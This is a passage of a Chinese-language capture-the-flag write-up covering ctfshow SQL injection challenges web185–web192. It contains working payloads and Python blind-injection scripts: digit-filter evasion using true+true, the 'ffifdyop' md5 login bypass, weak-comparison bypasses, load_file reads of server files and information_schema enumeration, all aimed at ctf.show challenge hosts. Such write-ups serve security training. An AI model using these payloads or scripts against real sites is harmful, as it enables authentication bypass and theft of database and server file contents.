tableName=ctfshow_user as a right join ctfshow_user as b on b.pass like 0x63746673686F7725</span></span><br></pre></td></tr></table></figure></div>

<blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210730140931041.png" alt="image-20210730140931041"></p>
</blockquote>
<h2 id="web185"><a href="#web185" class="headerlink" title="web185"></a>web185</h2><blockquote>
<ul>
<li>这次直接过滤了0-9的所有数字，上个脚本进行改变</li>
</ul>
</blockquote>
<p><strong>这次我们利用true来进行替换数字</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">select true+true;</span><br><span class="line">结果是2</span><br><span class="line">所以我们构造数字c来进行like匹配</span><br></pre></td></tr></table></figure></div>

<p><strong>我们还是用like模糊匹配，然后利用concat连接true形成的字符和数字</strong></p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210730151426812.png" alt="image-20210730151426812"></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tableName=ctfshow_user as a right join ctfshow_user as b on b.pass like concat(char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true),char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true),char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true),char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true),char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true),char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true),char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true),char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true))</span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210730151523656.png" alt="image-20210730151523656"></p>
<p><strong>页面可以正常回显，代码跑起py</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:孤桜懶契</span></span><br><span class="line"><span class="comment"># Date:2021/4/8 21:24</span></span><br><span class="line"><span class="comment"># blog: gylq.gitee.io</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> binascii</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">createNum</span><span class="params">(n)</span>:</span></span><br><span class="line">    num=<span class="string">'true'</span></span><br><span class="line">    <span class="keyword">if</span> n==<span class="number">1</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">"true"</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> range(n<span class="number">-1</span>):</span><br><span class="line">            num+=<span class="string">"+true"</span></span><br><span class="line">    <span class="keyword">return</span> num</span><br><span class="line"></span><br><span class="line"><span class="comment">#把每一个字符转换成ascii码对应的数值</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">change_str</span><span class="params">(s)</span>:</span></span><br><span class="line">    str=<span class="string">""</span></span><br><span class="line">    str+=<span class="string">"char("</span>+createNum(ord(s[<span class="number">0</span>]))+<span class="string">")"</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> s[<span class="number">1</span>:]:</span><br><span class="line">        str+=<span class="string">",char("</span>+createNum(ord(i))+<span class="string">")"</span></span><br><span class="line">    <span class="keyword">return</span> str</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://e0482185-09dd-40c6-854f-6df23ac4c58b.challenge.ctf.show:8080/select-waf.php"</span></span><br><span class="line">str = <span class="string">"0123456789abcdefghijklmnopqrstuvwxyz&#123;&#125;-"</span></span><br><span class="line"></span><br><span class="line">flag = <span class="string">"ctfshow"</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">666</span>):</span><br><span class="line">      print(<span class="string">'[*] 开始盲注第&#123;&#125;位'</span>.format(i))</span><br><span class="line">      <span class="keyword">for</span> j <span class="keyword">in</span> str:</span><br><span class="line">        result = change_str(flag + j + <span class="string">"%"</span>)</span><br><span class="line">        data = &#123;</span><br><span class="line">              <span class="string">"tableName"</span>:<span class="string">"ctfshow_user as a right join ctfshow_user as b on b.pass like (concat(&#123;&#125;))"</span>.format(result)</span><br><span class="line">        &#125;</span><br><span class="line">        res = requests.post(url,data)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">"$user_count = 43"</span> <span class="keyword">in</span> res.text:</span><br><span class="line">             flag += j</span><br><span class="line">             print(flag)</span><br><span class="line">             <span class="keyword">if</span> j==<span class="string">"&#125;"</span>:</span><br><span class="line">                 print(<span class="string">'[*] flag is &#123;&#125;'</span>.format(flag))</span><br><span class="line">                 exit()</span><br><span class="line">             <span class="keyword">break</span></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210730153336499.png" alt="image-20210730153336499"></p>
<h2 id="web186"><a href="#web186" class="headerlink" title="web186"></a>web186</h2><blockquote>
<ul>
<li>和上一题一样</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:孤桜懶契</span></span><br><span class="line"><span class="comment"># Date:2021/7/30</span></span><br><span class="line"><span class="comment"># blog: gylq.gitee.io</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> binascii</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">createNum</span><span class="params">(n)</span>:</span></span><br><span class="line">    num=<span class="string">'true'</span></span><br><span class="line">    <span class="keyword">if</span> n==<span class="number">1</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">"true"</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> range(n<span class="number">-1</span>):</span><br><span class="line">            num+=<span class="string">"+true"</span></span><br><span class="line">    <span class="keyword">return</span> num</span><br><span class="line"></span><br><span class="line"><span class="comment">#把每一个字符转换成ascii码对应的数值</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">change_str</span><span class="params">(s)</span>:</span></span><br><span class="line">    str=<span class="string">""</span></span><br><span class="line">    str+=<span class="string">"char("</span>+createNum(ord(s[<span class="number">0</span>]))+<span class="string">")"</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> s[<span class="number">1</span>:]:</span><br><span class="line">        str+=<span class="string">",char("</span>+createNum(ord(i))+<span class="string">")"</span></span><br><span class="line">    <span class="keyword">return</span> str</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://e0482185-09dd-40c6-854f-6df23ac4c58b.challenge.ctf.show:8080/select-waf.php"</span></span><br><span class="line">str = <span class="string">"0123456789abcdefghijklmnopqrstuvwxyz&#123;&#125;-"</span></span><br><span class="line"></span><br><span class="line">flag = <span class="string">"ctfshow"</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">666</span>):</span><br><span class="line">      print(<span class="string">'[*] 开始盲注第&#123;&#125;位'</span>.format(i))</span><br><span class="line">      <span class="keyword">for</span> j <span class="keyword">in</span> str:</span><br><span class="line">        result = change_str(flag + j + <span class="string">"%"</span>)</span><br><span class="line">        data = &#123;</span><br><span class="line">              <span class="string">"tableName"</span>:<span class="string">"ctfshow_user as a right join ctfshow_user as b on b.pass like (concat(&#123;&#125;))"</span>.format(result)</span><br><span class="line">        &#125;</span><br><span class="line">        res = requests.post(url,data)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">"$user_count = 43"</span> <span class="keyword">in</span> res.text:</span><br><span class="line">             flag += j</span><br><span class="line">             print(flag)</span><br><span class="line">             <span class="keyword">if</span> j==<span class="string">"&#125;"</span>:</span><br><span class="line">                 print(<span class="string">'[*] flag is &#123;&#125;'</span>.format(flag))</span><br><span class="line">                 exit()</span><br><span class="line">             <span class="keyword">break</span></span><br></pre></td></tr></table></figure></div>

<blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210730154141902.png" alt="image-20210730154141902"></p>
</blockquote>
<h2 id="web187"><a href="#web187" class="headerlink" title="web187"></a>web187</h2><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$username = $_POST[<span class="string">'username'</span>];</span><br><span class="line">$password = md5($_POST[<span class="string">'password'</span>],<span class="keyword">true</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">//只有admin可以获得flag</span></span><br><span class="line"><span class="keyword">if</span>($username!=<span class="string">'admin'</span>)&#123;</span><br><span class="line">	$ret[<span class="string">'msg'</span>]=<span class="string">'用户名不存在'</span>;</span><br><span class="line">   <span class="keyword">die</span>(json_encode($ret));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<blockquote>
<ul>
<li>登陆窗口，看返回逻辑</li>
</ul>
</blockquote>
<p><strong>很明显注入点是md5()函数这里，后面用了参数true，返回的是一个16位二进制</strong></p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210730155322904.png" alt="image-20210730155322904"></p>
<p>网上有一个字符串<code>ffifdyop</code>很特殊</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">echo</span> md5(<span class="string">"ffifdyop"</span>,<span class="keyword">true</span>);</span><br><span class="line"><span class="comment">//结果</span></span><br><span class="line"><span class="string">'or'</span><span class="number">6</span>�]��!r,��b</span><br><span class="line"> 刚好成万能密码</span><br><span class="line">  password=<span class="string">''</span><span class="keyword">or</span> <span class="keyword">true</span></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210730155234977.png" alt="image-20210730155234977"></p>
<h2 id="web188"><a href="#web188" class="headerlink" title="web188"></a>web188</h2><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"> $sql = "<span class="keyword">select</span> pass <span class="keyword">from</span> ctfshow_user <span class="keyword">where</span> username = &#123;$username&#125;<span class="string">";</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">//密码判断</span></span><br><span class="line"><span class="string">  if($row['pass']==intval($password))&#123;</span></span><br><span class="line"><span class="string">      $ret['msg']='登陆成功';</span></span><br><span class="line"><span class="string">      array_push($ret['data'], array('flag'=&gt;$flag));</span></span><br><span class="line"><span class="string">    &#125;</span></span><br></pre></td></tr></table></figure></div>

<p>可以看到是通过username来列出密码，然后弱比较来进行判断payload</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=0&amp;password=0</span><br></pre></td></tr></table></figure></div>

<p><strong>以这道题的数据库为例，这个数据库中的用户名都是以字母开头的数据，而以字母开头的数据在和数字比较时，会被强制转换为0，因此就会相等，后面的pass也是一样的道理</strong><br><strong>但注意，如果有某个数据不是以字母开头，是匹配不成功的，这种情况怎么办，我们可以用<code>||</code>运算符</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=1||1&amp;password=0</span><br></pre></td></tr></table></figure></div>

<h2 id="web189"><a href="#web189" class="headerlink" title="web189"></a>web189</h2><p><strong>因为确定一定包含ctfshow这个内容，所以通过load_file的返回值“\u67e5\u8be2\u5931\u8d25”判断是否存在，写个payload</strong></p>
<blockquote>
<p><strong>LOAD_FILE(file_name)：</strong> 读取文件并返回文件内容为字符串。要使用此函数，文件必须位于服务器主机上，必须指定完整路径的文件，而且必须有FILE权限。</p>
<p><strong>regexp：</strong> mysql中的正则表达式操作符</p>
</blockquote>
<p><strong>容易想到默认路径是<code>/var/www/html/api/index.php</code>，开始写个脚本进行盲注</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:孤桜懶契</span></span><br><span class="line"><span class="comment"># Date:2021/4/8 21:24</span></span><br><span class="line"><span class="comment"># blog: gylq.gitee.io</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">"http://e89f25b2-8acb-4c79-8368-56f445f77e6c.challenge.ctf.show:8080/api/index.php"</span></span><br><span class="line">str = <span class="string">"0123456789abcdefghijklmnopqrstuvwxyz-&#123;&#125;"</span></span><br><span class="line">flag = <span class="string">"ctfshow&#123;"</span></span><br><span class="line">payload=<span class="string">"if(load_file('/var/www/html/api/index.php')regexp('&#123;0&#125;'),1,0)"</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">666</span>):</span><br><span class="line">    print(<span class="string">'[*] 开始盲注第&#123;&#125;位'</span>.format(i))</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> str:</span><br><span class="line">        data=&#123;</span><br><span class="line">            <span class="string">"username"</span>:payload.format(flag + j),</span><br><span class="line">            <span class="string">"password"</span>:<span class="number">0</span></span><br><span class="line">        &#125;</span><br><span class="line">        res = requests.post(url,data)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">r"\u67e5\u8be2\u5931\u8d25"</span> <span class="keyword">in</span> res.text:</span><br><span class="line">            flag += j</span><br><span class="line">            print(flag)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        <span class="keyword">if</span> j==<span class="string">'&#125;'</span>:</span><br><span class="line">            print(<span class="string">'[*] flag is &#123;&#125;'</span>.format(flag))</span><br><span class="line">            exit()</span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210730180926218.png" alt="image-20210730180926218"></p>
<h2 id="web190"><a href="#web190" class="headerlink" title="web190"></a>web190</h2><blockquote>
<p>经典盲注，脚本跑</p>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:孤桜懶契</span></span><br><span class="line"><span class="comment"># Date:2021/7/30</span></span><br><span class="line"><span class="comment"># blog: gylq.gitee.io</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">"http://17f404c9-b645-40ab-8daf-f60c335e2d84.challenge.ctf.show:8080/api/"</span></span><br><span class="line">str = <span class="string">"01234567890-=!@#$%^&amp;*()_+`~ qwertyuiopasdfghjklzxcvbnm[];,./&#123;&#125;:&lt;&gt;?\|"</span></span><br><span class="line">flag = <span class="string">""</span></span><br><span class="line"><span class="comment">#查表 payload="admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),&#123;&#125;,1)='&#123;&#125;',1,0)#"</span></span><br><span class="line"><span class="comment">#查字段 payload="admin' and if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_fl0g'),&#123;&#125;,1)='&#123;&#125;',1,0)#"</span></span><br><span class="line">payload=<span class="string">"admin' and if(substr((select f1ag from ctfshow_fl0g),&#123;&#125;,1)='&#123;&#125;',1,0)#"</span></span><br><span class="line">n=<span class="number">0</span></span><br><span class="line"><span class="comment"># admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',1,0)#</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">666</span>):</span><br><span class="line">      <span class="keyword">for</span> j <span class="keyword">in</span> str:</span><br><span class="line">        data = &#123;</span><br><span class="line">              <span class="string">"username"</span>:payload.format(i,j),</span><br><span class="line">              <span class="string">"password"</span>:<span class="number">123456</span></span><br><span class="line">        &#125;</span><br><span class="line">        res = requests.post(url,data)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">r"\u5bc6\u7801\u9519\u8bef"</span> <span class="keyword">in</span> res.text:</span><br><span class="line">             flag += j</span><br><span class="line">             n+=<span class="number">1</span></span><br><span class="line">             print(<span class="string">'[*] 开始盲注第&#123;&#125;位'</span>.format(n))</span><br><span class="line">             print(flag)</span><br><span class="line">             <span class="keyword">if</span> j==<span class="string">"&#125;"</span>:</span><br><span class="line">                 print(<span class="string">'[*] flag is &#123;&#125;'</span>.format(flag))</span><br><span class="line">                 exit()</span><br><span class="line">             <span class="keyword">break</span></span><br></pre></td></tr></table></figure></div>

<blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210730190843467.png" alt="image-20210730190843467"></p>
</blockquote>
<h2 id="web191"><a href="#web191" class="headerlink" title="web191"></a>web191</h2><blockquote>
<ul>
<li>和上题一样，过滤了ascii等，不过我写的payload没用</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:孤桜懶契</span></span><br><span class="line"><span class="comment"># Date:2021/7/30</span></span><br><span class="line"><span class="comment"># blog: gylq.gitee.io</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">"http://17f404c9-b645-40ab-8daf-f60c335e2d84.challenge.ctf.show:8080/api/"</span></span><br><span class="line">str = <span class="string">"01234567890-=!@#$%^&amp;*()_+`~ qwertyuiopasdfghjklzxcvbnm[];,./&#123;&#125;:&lt;&gt;?\|"</span></span><br><span class="line">flag = <span class="string">""</span></span><br><span class="line"><span class="comment">#查表 payload="admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),&#123;&#125;,1)='&#123;&#125;',1,0)#"</span></span><br><span class="line"><span class="comment">#查字段 payload="admin' and if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_fl0g'),&#123;&#125;,1)='&#123;&#125;',1,0)#"</span></span><br><span class="line">payload=<span class="string">"admin' and if(substr((select f1ag from ctfshow_fl0g),&#123;&#125;,1)='&#123;&#125;',1,0)#"</span></span><br><span class="line">n=<span class="number">0</span></span><br><span class="line"><span class="comment"># admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',1,0)#</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">666</span>):</span><br><span class="line">      <span class="keyword">for</span> j <span class="keyword">in</span> str:</span><br><span class="line">        data = &#123;</span><br><span class="line">              <span class="string">"username"</span>:payload.format(i,j),</span><br><span class="line">              <span class="string">"password"</span>:<span class="number">123456</span></span><br><span class="line">        &#125;</span><br><span class="line">        res = requests.post(url,data)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">r"\u5bc6\u7801\u9519\u8bef"</span> <span class="keyword">in</span> res.text:</span><br><span class="line">             flag += j</span><br><span class="line">             n+=<span class="number">1</span></span><br><span class="line">             print(<span class="string">'[*] 开始盲注第&#123;&#125;位'</span>.format(n))</span><br><span class="line">             print(flag)</span><br><span class="line">             <span class="keyword">if</span> j==<span class="string">"&#125;"</span>:</span><br><span class="line">                 print(<span class="string">'[*] flag is &#123;&#125;'</span>.format(flag))</span><br><span class="line">                 exit()</span><br><span class="line">             <span class="keyword">break</span></span><br></pre></td></tr></table></figure></div>

<blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210730191215328.png" alt="image-20210730191215328"></p>
</blockquote>
<h2 id="web192"><a href="#web192" class="headerlink" title="web192"></a>web192</h2><blockquote>
<ul>
<li>和上题一样，没办=号，我们依旧潇洒</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:孤桜懶契</span></span><br><span class="line"><span class="comment"># Date:2021/7/30</span></span><br><span class="line"><span class="comment"># blog: gylq.gitee.io</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">"http://8ab877db-cd5c-424f-bb9c-0f54ba6447c7.challenge.ctf.show:8080/api/"</span></span><br><span class="line">str = <span class="string">"01234567890-=!@#$%^&amp;*()_+`~ qwertyuiopasdfghjklzxcvbnm[];,./&#123;&#125;:&lt;&gt;?\|"</span></span><br><span class="line">flag = <span class="string">""</span></span><br><span class="line"><span class="comment">#查表 payload="admin' and if(substr((select group_concat(table_name) from 